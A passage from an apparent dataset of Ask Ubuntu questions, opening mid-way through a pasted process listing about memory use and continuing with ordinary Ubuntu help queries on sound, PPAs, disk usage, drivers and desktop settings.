scsi_eh_4 ] root 279 0.0 0.0 0 0 ? s jul11 0:00 [ scsi_eh_5 ] root 353 0.0 0.0 0 0 ? s jul11 0:01 [ jbd2/sda1-8 ] root 354 0.0 0.0 0 0 ? s < jul11 0:00 [ ext4-dio-unwr ] root 404 0.0 0.0 17052 520 ? s jul11 0:00 upstart-udev-br root 414 0.0 0.0 21536 652 ? s < s jul11 0:00 udevd -- daemon root 627 0.0 0.0 0 0 ? s jul11 0:00 [ ips-adjust ] root 630 0.0 0.0 0 0 ? s jul11 0:02 [ ips-monitor ] root 631 0.0 0.0 0 0 ? s < jul11 0:00 [ kmemstick ] root 655 0.0 0.0 0 0 ? s < jul11 0:00 [ kpsmoused ] root 657 0.0 0.0 0 0 ? s < jul11 0:00 [ cfg80211 ] root 806 0.0 0.0 15004 496 ? s jul11 0:00 upstart-socket- root 819 0.0 0.0 0 0 ? s < jul11 0:00 [ iwlagn ] root 858 0.0 0.0 0 0 ? s < jul11 0:00 [ l2cap ] root 911 0.0 0.0 0 0 ? s < jul11 0:00 [ hd-audio0 ] root 920 0.0 0.0 0 0 ? s < jul11 0:00 [ hd-audio1 ] syslog 989 0.0 0.0 119988 924 ? sl jul11 0:00 rsyslogd -c4 102 1002 0.0 0.0 25496 2316 ? ss jul11 0:18 dbus-daemon -- s root 1014 0.0 0.0 83168 2848 ? ssl jul11 0:00 gdm-binary avahi 1018 0.0 0.0 32132 1336 ? s jul11 0:00 avahi-daemon : r avahi 1019 0.0 0.0 32008 156 ? s jul11 0:00 avahi-daemon : c root 1020 0.0 0.0 158344 3452 ? ssl jul11 0:06 networkmanager root 1022 0.0 0.0 125528 2376 ? sl jul11 0:01 /usr/sbin/conso root 1037 0.0 0.0 64656 1972 ? s jul11 0:00 /usr/sbin/modem root 1113 0.0 0.0 136612 3404 ? sl jul11 0:02 /usr/lib/policy root 1130 0.0 0.0 77284 2012 ? ss jul11 0:00 /usr/sbin/cupsd root 1170 0.0 0.0 97816 2704 ? sl jul11 0:00 /usr/lib/gdm/gd root 1180 0.0 0.0 6196 528 tty4 ss+ jul11 0:00 /sbin/getty -8 root 1183 0.0 0.0 6196 528 tty5 ss+ jul11 0:00 /sbin/getty -8 root 1196 0.0 0.0 6196 532 tty2 ss+ jul11 0:00 /sbin/getty -8 root 1199 0.0 0.0 6196 528 tty3 ss+ jul11 0:00 /sbin/getty -8 root 1204 0.0 0.0 6196 528 tty6 ss+ jul11 0:00 /sbin/getty -8 root 1214 0.0 0.0 4416 784 ? ss jul11 0:00 acpid -c /etc/a root 1217 0.0 0.0 18928 844 ? ss jul11 0:00 cron daemon 1220 0.0 0.0 16728 200 ? ss jul11 0:00 atd root 1230 1.8 1.1 533108 44700 tty7 ss+ jul11 32:07 /usr/bin/x :0 - mysql 1245 0.0 0.0 168744 2572 ? ssl jul11 0:10 /usr/sbin/mysql root 1248 0.0 0.0 15780 564 ? ss jul11 0:05 /usr/sbin/irqba root 1262 0.0 0.0 28932 1260 ? s jul11 0:01 /sbin/wpa_suppl root 1292 0.0 0.0 4400 368 ? s jul11 0:00 /usr/sbin/hddte root 1411 0.0 0.0 37364 1092 ? ss jul11 0:00 /usr/lib/postfi root 1465 0.0 0.0 65800 672 ? ss jul11 0:00 /usr/sbin/winbi root 1535 0.0 0.0 0 0 ? s < jul11 0:00 [ krfcommd ] root 1569 0.0 0.0 173652 1308 ? ss jul11 0:00 /usr/sbin/apach www-data 1582 0.0 0.0 173652 236 ? s jul11 0:00 /usr/sbin/apach www-data 1583 0.0 0.0 173652 236 ? s jul11 0:00 /usr/sbin/apach www-data 1584 0.0 0.0 173652 236 ? s jul11 0:00 /usr/sbin/apach www-data 1585 0.0 0.0 173652 236 ? s jul11 0:00 /usr/sbin/apach www-data 1586 0.0 0.0 173652 236 ? s jul11 0:00 /usr/sbin/apach root 1630 0.0 0.0 0 0 ? s jul11 0:00 [ flush-8:0 ] root 1637 0.0 0.0 65800 224 ? s jul11 0:00 /usr/sbin/winbi root 1766 0.0 0.0 6196 528 tty1 ss+ jul11 0:00 /sbin/getty -8 root 1820 0.0 0.0 135156 2396 ? sl jul11 0:00 /usr/lib/gdm/gd rtkit 1825 0.0 0.0 103164 1040 ? snl jul11 0:00 /usr/lib/rtkit/ root 1830 0.0 0.1 144204 4276 ? sl jul11 0:15 /usr/lib/upower ulti 2065 0.0 0.1 189116 3896 ? sl jul11 0:00 /usr/bin/gnome- ulti 2084 0.0 0.1 243352 6428 ? ssl jul11 0:03 gnome-session - ulti 2116 0.0 0.0 60840 3028 ? sl jul11 0:31 /usr/bin/ibus-d ulti 2120 0.0 0.0 12092 16 ? ss jul11 0:00 /usr/bin/ssh-ag ulti 2123 0.0 0.0 26400 328 ? s jul11 0:00 /usr/bin/dbus-l ulti 2124 0.0 0.0 27712 3128 ? ss jul11 1:15 //bin/dbus-daem ulti 2126 0.0 0.0 130548 2792 ? sl jul11 0:00 /usr/lib/ibus/i ulti 2128 0.0 0.5 456024 19524 ? sl jul11 0:41 /usr/bin/python ulti 2130 0.0 0.1 145864 5700 ? s jul11 0:00 /usr/lib/ibus/i ulti 2135 0.0 0.1 61484 3972 ? s jul11 0:04 /usr/lib/libgco ulti 2137 0.0 0.1 72168 5692 ? s jul11 0:03 /usr/lib/ibus-p ulti 2145 0.0 0.2 474668 8128 ? ssl jul11 0:18 /usr/lib/gnome- ulti 2149 0.0 0.3 344292 14180 ? sl jul11 0:22 /usr/lib/notify ulti 2158 0.0 0.0 55960 2148 ? s jul11 0:00 /usr/lib/gvfs/g ulti 2163 0.0 0.0 81008 1488 ? ssl jul11 0:00 /usr/lib/gvfs// ulti 2167 0.3 0.2 279904 8684 ? sl jul11 6:35 /usr/bin/compiz ulti 2186 0.0 0.0 22608 768 ? s jul11 0:13 syndaemon -i 0. ulti 2188 0.0 0.0 161972 3272 ? s jul11 0:00 /usr/lib/gvfs/g root 2191 0.0 0.0 136120 3504 ? sl jul11 0:00 /usr/lib/udisks root 2192 0.0 0.0 45168 804 ? s jul11 0:02 udisks-daemon : ulti 2195 0.0 0.0 77352 1752 ? sl jul11 0:01 /usr/lib/gvfs/g ulti 2198 0.0 0.0 63556 2028 ? s jul11 0:00 /usr/lib/gvfs/g ulti 2199 0.1 1.4 738152 55152 ? sl jul11 2:27 nautilus ulti 2201 0.0 0.4 398040 16004 ? sll jul11 0:25 nm-applet -- sm- ulti 2202 0.0 0.1 347020 6020 ? sl jul11 0:00 /usr/lib/evolut ulti 2203 0.0 0.2 317560 8580 ? sl jul11 0:00 bluetooth-apple ulti 2204 0.0 0.1 289280 5972 ? sl jul11 0:01 zeitgeist-datah ulti 2207 0.0 0.4 381248 18424 ? sl jul11 0:16 gnome-panel ulti 2211 0.0 0.2 339028 10792 ? sl jul11 0:00 /usr/lib/policy ulti 2212 0.0 0.6 478920 24388 ? sl jul11 0:02 synapse -- start ulti 2219 0.0 0.3 188988 11680 ? sl jul11 0:02 /usr/bin/python ulti 2221 0.1 0.3 995912 13024 ? sl jul11 2:20 python /usr/bin ulti 2223 0.0 0.3 480188 13952 ? sl jul11 0:40 gnome-power-man ulti 2232 0.0 0.5 688680 20392 ? ssl jul11 0:20 /home/ulti/.d ulti 2235 0.0 0.0 10848 452 ? s jul11 0:00 /bin/cat ulti 2240 0.0 0.1 330376 5452 ? sl jul11 0:01 /usr/lib/evolut ulti 2243 0.0 0.0 0 0 ? z jul11 0:00 [ zei ] < defunct > ulti 2261 0.0 0.1 180360 5624 ? s jul11 0:00 /usr/lib/gnome- ulti 2325 0.0 0.2 281168 8304 ? sl jul11 0:00 /usr/lib/gnome- ulti 2327 0.0 0.0 60780 2912 ? s jul11 0:00 /usr/lib/gvfs/g ulti 2330 0.0 0.0 56812 2496 ? s jul11 0:00 /usr/bin/obex-d ulti 2331 0.0 0.1 245636 5244 ? ss jul11 0:04 gnome-screensav ulti 2348 0.0 0.0 4220 488 ? ss jul11 0:00 /bin/sh -c /usr ulti 2349 0.0 0.3 339428 13760 ? sl jul11 0:18 /usr/bin/unity- ulti 2351 0.0 0.0 161388 2380 ? ssl jul11 0:00 /usr/lib/bonobo ulti 2368 0.0 0.3 346704 15276 ? sl jul11 1:09 /usr/lib/gnome- ulti 2371 0.0 0.2 372276 10936 ? sl jul11 0:21 /usr/lib/gnome- ulti 2373 0.0 0.2 298172 9268 ? sl jul11 0:00 /usr/lib/gnome- ulti 2375 0.4 0.5 415272 21692 ? sl jul11 7:48 /usr/lib/indica ulti 2377 0.0 0.2 276272 8636 ? sl jul11 0:24 /usr/lib/gnome- ulti 2411 0.0 0.0 49920 2144 ? s jul11 0:00 /usr/lib/gvfs/g ulti 2414 0.0 0.0 122464 2396 ? sl jul11 0:00 /usr/lib/d-conf ulti 2421 0.0 0.1 305576 4624 ? sl jul11 0:00 /usr/lib/indica ulti 2423 0.0 0.1 227072 4028 ? sl jul11 0:00 /usr/lib/indica ulti 2425 0.0 0.1 405464 4152 ? sl jul11 0:01 /usr/lib/indica ulti 2427 0.0 0.1 315800 6724 ? sl jul11 0:01 /usr/lib/indica ulti 2429 0.0 0.1 209964 6180 ? sl jul11 0:35 /usr/lib/indica ulti 2431 0.0 0.1 311128 4096 ? sl jul11 0:00 /usr/lib/indica ulti 2460 0.0 0.0 159216 3016 ? sl jul11 0:01 /usr/lib/geoclu ulti 2466 0.0 0.0 56220 2008 ? s jul11 0:00 /usr/lib/gvfs/g ulti 2491 0.0 0.2 237108 7964 ? s jul11 0:11 /usr/bin/python ulti 2511 0.1 0.5 431804 22796 ? sl jul11 2:35 xchat ulti 2513 0.0 0.2 225192 10000 ? s jul11 0:07 /usr/lib/bamf/b ulti 2517 0.0 0.3 368132 12532 ? sl jul11 0:44 /usr/bin/python ulti 2555 0.3 0.2 291168 7864 ? sl jul11 5:24 skype ulti 2556 0.0 0.2 322488 9860 ? sl jul11 0:01 update-notifier ulti 2628 0.0 0.3 334148 15260 ? dl jul11 0:07 gnome-terminal ulti 2636 0.0 0.0 14612 764 ? s jul11 0:00 gnome-pty-helpe ulti 6237 0.5 2.1 742192 81440 ? sll jul11 5:56 /opt/google/chr ulti 6242 0.0 0.0 238432 3284 ? s jul11 0:11 /opt/google/chr ulti 6244 0.0 0.1 274712 5940 ? s jul11 0:00 /opt/google/chr ulti 6267 0.1 1.6 958724 65380 ? snl jul11 1:49 /opt/google/chr ulti 6275 0.0 0.3 869444 13328 ? sl jul11 0:06 /opt/google/chr ulti 6303 0.0 0.3 869440 13668 ? sl jul11 0:07 /opt/google/chr ulti 6342 0.0 0.4 870532 15612 ? sl jul11 0:08 /opt/google/chr ulti 6347 0.0 0.3 869444 13268 ? sl jul11 0:06 /opt/google/chr ulti 6358 1.1 1.4 1003268 54604 ? sl jul11 12:00 python /usr/bin ulti 7642 0.0 0.1 271220 7344 ? s jul11 0:00 /usr/lib/gvfs/g ulti 9719 0.0 0.1 28516 5580 pts/1 ss jul11 0:00 bash root 10577 0.0 0.0 0 0 ? s 08:15 0:00 [ migration/1 ] root 10579 0.0 0.0 0 0 ? s 08:15 0:00 [ ksoftirqd/1 ] root 10580 0.0 0.0 0 0 ? s 08:15 0:00 [ migration/2 ] root 10582 0.0 0.0 0 0 ? s 08:15 0:00 [ ksoftirqd/2 ] root 10583 0.0 0.0 0 0 ? s 08:15 0:00 [ migration/3 ] root 10585 0.0 0.0 0 0 ? s 08:15 0:00 [ ksoftirqd/3 ] root 10613 0.0 0.0 0 0 ? s < 08:15 0:00 [ hci0 ] root 10638 0.0 0.0 0 0 ? s 08:15 0:00 [ mmcqd/0 ] root 10894 0.0 0.0 7084 820 ? s 08:15 0:00 /sbin/dhclient postfix 10995 0.0 0.0 39480 928 ? s 08:15 0:00 qmgr -l -t fifo root 11013 0.0 0.0 15664 1152 ? ss 08:16 0:00 /sbin/mount.ntf ulti 11339 0.0 0.3 262796 13452 ? sl 08:31 0:01 /opt/google/chr ulti 12488 3.2 2.9 1044824 114420 ? sl 09:33 10:16 python /usr/bin ulti 12923 0.0 0.0 287192 2552 ? s < sl 09:53 0:04 /usr/bin/pulsea ulti 12929 0.0 0.0 181372 3096 ? sl 09:53 0:00 /usr/lib/pulsea root 15585 0.0 0.0 84056 3488 ? s 11:16 0:00 /usr/bin/python ulti 15756 0.0 0.0 71016 3080 ? s 11:23 0:00 /usr/lib/gvfs/g root 15952 0.0 0.0 73200 2764 ? s 11:25 0:00 /usr/bin/python ulti 15998 0.0 0.0 0 0 ? z 11:25 0:00 [ sh ] < defunct > root 16013 0.0 0.0 0 0 ? s 11:26 0:01 [ kworker/1:1 ] root 16672 0.0 0.0 0 0 ? s 11:33 0:01 [ kworker/u:0 ] root 16697 0.0 0.0 0 0 ? s 11:33 0:02 [ kworker/2:1 ] ulti 16937 0.0 0.0 42516 3556 pts/1 s+ 11:36 0:02 ssh -2 -c -d 80 root 17235 0.0 0.0 21532 684 ? s < 11:46 0:00 udevd -- daemon root 17236 0.0 0.0 21532 640 ? s < 11:46 0:00 udevd -- daemon root 17428 0.0 0.0 0 0 ? s 11:57 0:01 [ kworker/u:2 ] postfix 18676 0.0 0.0 39428 1372 ? s 13:15 0:00 pickup -l -t fi ulti 19703 0.0 0.1 28516 5844 pts/0 ss 14:04 0:00 bash root 19838 0.0 0.0 23252 1644 ? ss 14:05 0:00 /usr/sbin/bluet root 20081 0.0 0.0 0 0 ? s 14:09 0:00 [ kworker/3:0 ] root 20269 0.0 0.0 0 0 ? s 14:14 0:00 [ kworker/2:2 ] root 20322 0.0 0.0 0 0 ? s 14:15 0:00 [ kworker/1:2 ] root 20639 0.0 0.0 0 0 ? s 14:26 0:00 [ kworker/3:1 ] root 20711 0.0 0.0 0 0 ? s 14:30 0:00 [ kworker/0:1 ] root 20805 0.0 0.0 0 0 ? s 14:33 0:00 [ kworker/u:3 ] root 20861 0.0 0.0 0 0 ? s 14:35 0:00 [ kworker/0:0 ] root 21027 0.0 0.0 0 0 ? s 14:41 0:00 [ kworker/0:2 ] ulti 21098 2.7 1.0 893504 39720 ? snl 14:44 0:01 /opt/google/chr ulti 21116 2.1 0.6 381512 24504 ? sl 14:45 0:01 geany ulti 21120 0.0 0.0 14612 828 ? s 14:45 0:00 gnome-pty-helpe ulti 21121 0.5 0.1 28504 5812 pts/2 ss+ 14:45 0:00 /bin/bash ulti 21236 7.1 1.0 895512 41708 ? sl 14:45 0:01 /opt/google/chr ulti 21246 0.0 0.0 21932 1400 pts/0 r+ 14:46 0:00 ps -aux vmstats after swapiness is set 10 procs -- -- -- -- -- -memory -- -- -- -- -- -- -swap -- -- -- -io -- -- -system -- -- -- cpu -- -- r b swpd free buff cache si so bi bo in cs us sy id wa 2 0 1458588 119320 2292 2748584 1 13 32 25 16 192 6 2 90 2 why is the virtual memory usage so high ? that 's way higher than what both my swap and my memory can offer . smap info : these are long chrome memory from smaps - ~ 930mb virt emesene memory from smaps - ~ 900mb virt update : here 's recently an out of memory event ( i turned swap off at this point , also the cached memory is taking up round 2.5gb at the point , and only ~1gb of physical memory is used , so technically i have another 2.5gb to work with due to the supposed taking back of the cache by the kernel ) : syslog event showing the supposed `` out of memory event '' also a page showing my exact problem : http : //raj2796.wordpress.com/2009/11/09/reducing-cached-memory-usage-linux-high-memory-usage-diagnosing-and-troubleshooting-on-vmware-and-out-of-memory-oom-killer-problem-and-solution/
51787	alternative to easystroke ( mouse gesture recognition software )	even though i really like easystroke 's feature set , i would like to know if there is any other gesture recognition software out there , preferably with a larger feature set or more accurate gesture recognition . a quick google search brought gestikk to my attention , has anyone used it and want to share his/her experience ?
51791	use a ppa with a password while still using apt-cacher-ng ?	i 'm using apt-cacher-ng to cache package downloads for my lan . i 'm also using the ubuntu beta fonts ppa which requires a password for access . i keep getting the error bjorn @ bjorn-laptop-natty : ~ $ sudo apt-get update [ sudo ] password for bjorn : ign http : //extras.ubuntu.com natty inrelease < snip > ign https : //private-ppa.launchpad.net natty/main amd64 packages/diffindex ign https : //private-ppa.launchpad.net natty/main translationindex err https : //private-ppa.launchpad.net natty/main sources failed to connect to 0.0.7.209 : invalid argument err https : //private-ppa.launchpad.net natty/main amd64 packages failed to connect to 0.0.7.209 : invalid argument ign https : //private-ppa.launchpad.net natty/main translation-en_us ign https : //private-ppa.launchpad.net natty/main translation-en hit http : //us.archive.ubuntu.com natty release.gpg hit http : //us.archive.ubuntu.com natty-updates release.gpg < snip > ign http : //security.ubuntu.com natty-security/universe translation-en fetched 72 b in 7s ( 10 b/s ) w : failed to fetch https : //private-ppa.launchpad.net/ubuntu-font-beta-testing/ppa/ubuntu/dists/natty/main/source/sources failed to connect to 0.0.7.209 : invalid argument w : failed to fetch https : //private-ppa.launchpad.net/ubuntu-font-beta-testing/ppa/ubuntu/dists/natty/main/binary-amd64/packages failed to connect to 0.0.7.209 : invalid argument e : some index files failed to download . they have been ignored , or old ones used instead . it works properly if i disable using apt-cacher-ng . it seems weird that it says that it is trying to connect to 0.0.7.209 ; i 'm pretty sure that 's not the address of launchpad 's ppas . i do n't always want to be changing settings just to check for updates , so how can i make apt-cacher-ng and a passworded ppa work together ?
51793	are there any ubuntu tablets for sale in the u.s. ?	are there any tablets preinstalled with ubuntu for sale in the united states ? if so , who makes them and where can they be purchased ?
51797	how can i lower the memory usage in nautilus elementary ?	currently nautilus is using around 175 to 185mb of ram . this seems unnecessary , since there are no folders open , only dropbox and ubuntu one running ( plugins ) , and no other known sources of this ram hogging . what can i do to lower nautilus memory hogging ?
51798	why is only 3.2gbs out of 5 showing up ?	i have 64bit ubuntu installed , and a msi graphics card . any ideas on why this might be happening ?
51801	no sound from speakers	i was mucking with my sound card hardware profile in the sound preferences menu and i seem to have lost my sound . but what 's strange is that when i open the pulseaudio volume control panel i can see the audio bar moving and if i pause or stop my music , the bar stop . but no sound is coming out of my speakers . and i 've checked the obvious speaker connections , restarted the machine , dpkg-reconfigure pulseaudio , deleted the .pulse folder from my home directory , etc . nothing seems to be working . any suggestions would be helpful . the soundcard is an internal cl sound blaster , the onboard audio is turned off on my motherboard .
51803	no plymouth in video card intel mobile 945gme	recently , i have installed maverick in my old netbook with intel mobile 945gme video card , work flawlessly , but the problem is plymouth . when i boot up my netbook , the plymouth not start it just black screen then gnome desktop appear . sometime there are text shown ( i 'm not understand the purpose of the text , it like login in `` text mode '' when we press ctrl+alt+f1 but after second ( without typing anything ) , gnome desktop appear ) then sometime plymouth shown ( but rare ) in short duration ( the plymouth even shown only in 1 second ) i 'm try set the resolution from grub , no result . your help really apreciated
51809	how to re-install dvd-driver in ubuntu	i have removed the dvd-rom drive from my laptop ( not the disk ) . when i install the drive again . the device did n't displayed in /dev/cdrom or /dev/dvd is there a command that can make ubuntu scan for new hardware and install the driver ?
51814	compiling objective-c programs on ubuntu and a good ide for the same ?	i am trying my hands on objective-c and i want to know that how can i compile the programs in ubuntu . can i do it with gcc or something else is required ? and also please tell me some good ide/editor for objective-c . i am a fan of geany but it does not support objective-c . i dont want to use vim or emacs . thanks
51826	does auto updating work across major versions ?	i 'm using ubuntu 11.04 , and installing regular automatic updates . since 11.10 is out , i expected it will be auto upgraded , but no , i 'm still : $ cat /etc/issue ubuntu 11.04 now i want for example modal dialogs , but if i understand well , update will get only 11.10 users . is ubuntu auto updating major versions ?
51831	file are being deleted after renaming	renamed files dissapears from ubuntu one folder . i had to move files from u o to some temp location , rename them and upload them back . is there a special procedure for files renaming ?
51840	ssl certification is missing	i 'm trying to setup an ssl svn . i got a tutorial , but when i 'm trying to run the following command apache2-ssl-certificate i 'm getting a command not found error message . my question is how can i fix this problem ?
51844	ubuntu one account -the information could not be retrieved . maybe your internet connection is down ?	i think this is just cosmetic as my files synch fine , but the ubuntu one control panel in 11.04 gives me this message : the information could not be retrieved . maybe your internet connection is down ?
51845	is there any way to stop chromium ( or google chrome ) from auto-completing searches in the address bar ?	is there any way to stop chromium ( or google chrome ) from auto-completing searches in the address bar ? the best example of this i have seen is , if you type fire and ice into chromium’s omnibox and hit enter , it searches for fire and ice . if later you type fire into the omnibox and hit enter it “autocompletes” the search and again searches for fire and ice , not just fire . i find this very frustrating and would just like a way of stopping this behaviour .
51846	help restore nautilus	when i installed ubuntu 11.04 , i checked the box to encrypt my home folder . today , i set my account to log in without a password to allow my friend to borrow it . however once you click to log in . it says that nautilus can not find/create a directory for /home/username/desktop and all i get is a blank screen ( default 11.04 purple background and no unity . my keyboard shortcuts work , but nothing exists on the screen .
51847	installers asks me to insert cd that is already in tray	i have tried installing ubuntu 11.04 server and ubuntu 10.04 server on a fairly old amd athlon machine but after quite som time of the install the installer asks me to insert the install disk , which is already in the drive . i have tried both from a burnt cd and a burnt dvd disk with same outcome . checked integrity of the disks and the mem of the computer and everything ok. any input appreciated .
51854	is it possible to install a .deb from a url ?	is there a way to install a deb package directly from a url , using a shell ? something like dpkg -i http : //domain.com/path/to/package.deb ( i know i could use wget and then dpkg , i 'm just wondering if there 's something that does it already )
51855	df reports an ext4 partition is full , but there is no data	i recently received a warning , that my home-partition is full . it is an ext4-partition mounted on /home , /dev/sda is a 240 gb ssd : hannes @ xflr6 ~ > df -h filesystem size used avail use % mounted on /dev/sda1 19g 5.2g 13g 30 % / none 3.9g 792k 3.9g 1 % /dev none 3.9g 2.4m 3.9g 1 % /dev/shm none 3.9g 712k 3.9g 1 % /var/run none 3.9g 0 3.9g 0 % /var/lock /dev/sda5 193g 175g 7.9g 96 % /home /dev/sdb5 357g 92g 264g 26 % /mnt/schacht as you can see , df -h ( and gparted ) reports that /dev/sda5 is 96 % full . however , the ubuntu disk usage analyzer and du -h only find about 89 gb of data . ~/.gvfs is empty and there are no other filesystems mounted below /home . how can that be ? i have already tried running du as root , but it does n't change anything . root @ xflr6 ~ # sudo fdisk -l /dev/sda disk /dev/sda : 240.1 gb , 240057409536 bytes 255 heads , 63 sectors/track , 29185 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0003e4c5 device boot start end blocks id system /dev/sda1 * 1 2432 19530752 83 linux /dev/sda2 2432 28450 208984065 5 extended /dev/sda5 2432 27963 205077504 83 linux /dev/sda6 27963 28450 3905536 82 linux swap / solaris edit : whoops - i only ran du on ~ not on /home â there was a lot of data unintentionally copied to /home . my bad , sorry .
51857	limit applications that can go online when tethered	i sometimes usb tether my laptop to my phone to allow me to access the internet using 3g . the problem is that all sorts of things , such as the update manager , will go online and use up my valuable allowance . is it possible to somehow configurate things such that : when ( and only when ) i am connected to the internet using the tethered phone , no application is able to go online , except ... applications which are run under a certain user ( eg sudo -u internetaccess lynx http : //mysite/ ) when i am connected using wifi/ethernet access is normal is there a way i can do this ? ( i am on ubuntu 11.04 and my phone is an android - when i plug in the usb cable , it all just works )
51861	dual screen gets very slow with nvidia	when i enable a dual-screen with the nvidia x-server settings ( twinview ) my laptop becomes very slow ( you ca n't work anymore ) after a short time . strangely enough this occurred with dell and samsung monitors but it kept working fine with a lg monitor . i searched google , but could n't find any pointers yet ( neither on askubuntu or bugs.launchpad.net ) , so i hope someone recognizes this or help me to report a good bugreport . my graphics card info is 01:00.0 vga compatible controller : nvidia corporation g96m [ quadro fx 770m ] ( rev a1 ) ( prog-if 00 [ vga controller ] ) subsystem : hewlett-packard company device 30e7 flags : bus master , fast devsel , latency 0 , irq 16 memory at d2000000 ( 32-bit , non-prefetchable ) [ size=16m ] memory at c0000000 ( 64-bit , prefetchable ) [ size=256m ] memory at d0000000 ( 64-bit , non-prefetchable ) [ size=32m ] i/o ports at 7000 [ size=128 ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : nvidia kernel modules : nvidia-current , nouveau , nvidiafb i pasted my full hardware info at http : //paste.ubuntu.com/638376/ just tell me if you need to know more .
51864	can not connect to wired internet dell inspiron 1545	i have a dell inspiron 1545 and when i connect the internet cable , network manager does not recognizes it ... i am a beginner !
51865	ricoh aficio mp c6501 only prints white pages	we have ricoh `` aficio mp c6501 '' in my job and i try to print from ubuntu 11.04 . but it prints some hundred white pages ... . when i install the printer , ubuntu found it but when i try to print ... . only white pages . i try to find drivers from ricoh , but they had only for windows . i find this site ( brightq ) http : //ricoh.codehost.com/ did anyone use this drivers ?
51874	can i install digikam without installing most of kde ?	i 'd like to transition from f-spot to digikam because i fully believe it to be a better application for my needs , as somebody who takes and post-processes a lot of photos . the problem is ... well , i think the apt-get output says it better than i can : the following new packages will be installed akonadi-server digikam digikam-data dolphin kdebase-bin kdebase-data kdebase-runtime kdebase-runtime-data kdegraphics-libs-data kdelibs-bin kdelibs5-data kdelibs5-plugins kdepim-runtime kdepimlibs-kio-plugins kdoctools kfind kipi-plugins kipi-plugins-common konqueror konqueror-nsplugins kubuntu-debug-installer libakonadi-kabc4 libakonadi-kcal4 libakonadi-kde4 libakonadi-kmime4 libakonadiprotocolinternals1 libattica0 libboost-program-options1.42.0 libclucene0ldbl libgps19 libiodbc2 libkabc4 libkatepartinterfaces4 libkcal4 libkcmutils4 libkdcraw9 libkde3support4 libkdecore5 libkdesu5 libkdeui5 libkdewebkit5 libkdnssd4 libkemoticons4 libkexiv2-9 libkfile4 libkhtml5 libkidletime4 libkimap4 libkio5 libkipi8 libkjsapi4 libkjsembed4 libkldap4 libkmediaplayer4 libkmime4 libknewstuff3-4 libknotifyconfig4 libkntlm4 libkonq5-templates libkonq5a libkonqsidebarplugin4a libkparts4 libkpimutils4 libkprintutils4 libkpty4 libkresources4 libkrosscore4 libksane0 libktexteditor4 libkutils4 libmailtransport4 libmarblewidget11 libmicroblog4 libnepomuk4 libnepomukquery4a libnepomukutils4 libntrack-qt4-1 libntrack0 libplasma3 libpolkit-qt-1-1 libqapt-runtime libqapt1 libqca2 libqjson0 libqt4-sql-mysql libsolid4 libsoprano4 libstreamanalyzer0 libstreams0 libthreadweaver4 libvirtodbc0 marble-data marble-plugins mysql-client-core-5.1 mysql-server-core-5.1 ntrack-module-libnl-0 oxygen-icon-theme plasma-scriptengine-declarative plasma-scriptengine-javascript qapt-batch shared-desktop-ontologies soprano-daemon virtuoso-minimal virtuoso-opensource-6.1-bin virtuoso-opensource-6.1-common 0 upgraded , 105 newly installed , 0 to remove and 0 not upgraded . need to get 80.0 mb of archives . after this operation , 250 mb of additional disk space will be used . now , i 'm not adverse to installing things like qt . i 'm not even against installing a lot of packages ... . but digikam wants to install all the packages . why does it want mysql ? ! i thought it used sqlite ! konqueror ! ? dolphin ? ! these are hefty applications by themselves ... how could an image browser/editor need this much of kde ? is there a way i can trim this down so i 'm not installing every package and its brother ?
51876	when will asus eee ubuntu netbooks be for sale ?	early last month canonical announced that they were partnering with asus to bring eee netbooks with ubuntu 10.10 pre-installed to market on june 1st , 2011 : http : //www.canonical.com/content/asus-new-eee-pc-now-available-ubuntu-operating-system as of july 5 , i can not find any mention of any eee with ubuntu pre-installed on the market from any resaler , and no mention of ubuntu on the entire asus website . is there a time frame from asus or canonical on when we can expect these machines to hit the market ?
51878	get xfce desktop back	i have ubuntu 10.04 . after installing , i added xfce as my default desktop/windows manager . sometime over the weekend , my computer turned itself off . ( i 'm not sure what happened , but when i came over to use it , it was turned off . chromium said it was n't shut down cleanly when i started it up again ) . ever since then , xfce seems to be running gnome 's desktop . specifically , it 's using gnome 's desktop background , it is using the gnome right-click-on-the-desktop menu , and not letting me use the scroll wheel while pointing to the desktop to change workspaces . when i have terminal window with transparency open , it shows my xfce background images as being what is behind it , even though that is n't what is behind it . how do i restore xfce to its former glory ?
51881	fail2ban does n't match anything	i 'm working on a new build of my ftp server and i ca n't get the ssh part of fail2ban to match anything . manually checking with the regex command shows nothing . pam and proftpd are working fine , just not ssh . any ideas ? anyone already solved it , maybe ? ( hope hope hope )
51884	persistance with a remastersys iso on a usb pendrive	i 'm trying to create a bootable iso of ubuntu 11.04 using remastersys 's backup option . ubuntu 's make startup disk utility allows me to create a bootable usb drive with this iso , but the option for using part of the usb drive to store documents/settings is grayed out . not surprisingly , creating the bootable usb drive in this way does not offer persistance ( files/settings changes not preserved between reboots ) . does anyone know how i can create a bootable usb drive using this iso with persistance ?
51886	can i benefit from ubuntuone services on a non-ubuntu linux flavor ?	how can i use ubuntuone synchronization on a desktop running linux but not ubuntu ? for example on fedora or linux mint ? is there a way to achieve that ?
51887	how to set up a mail server correctly ?	i have read a number guides on setting up a mail server , but none of them seems to work completely . my requirements : i want to send and receive mails to and from all domains . ( i.e. , yahoo , gmail , aol , etc . ) i only need real system users . note : i am running ubuntu server edition .
51892	unresponsive interface	every once in a while the interface on the ubuntu box becomes unresponsive . the box has natty installed . the main menu on the top left and the taskbar icons on the top right can not be clicked on . the only thing that can be done is to close any running applications and restart the system . is there a more elegant solution ? somehow , this aspect of restarting the entire system just to get a functioning interface defeats the purpose of using linux . any help is kindly appreciated . thanks .
51897	how to set a background for compiz expo plugin	is it possible to set a background for the expo plugin instead of the reflection effect ?
51901	differences between gnome 2 and gnome 3	what are the differences between gnome 2 and gnome 3 ? and what is the gnome shell exactly , and is it possible to use gnome 3 without the gnome shell ( or are they the same thing ) ? and if so , would it be possible to maybe develop another shell similar to gnome panel ?
51902	nic stays on after shutdown	network stays on at 1gb after shutdown ... with windows 7 it would just shutdown with the rest . is there a way to make the nic behave as in windows 7 , this is not the router 's computer .
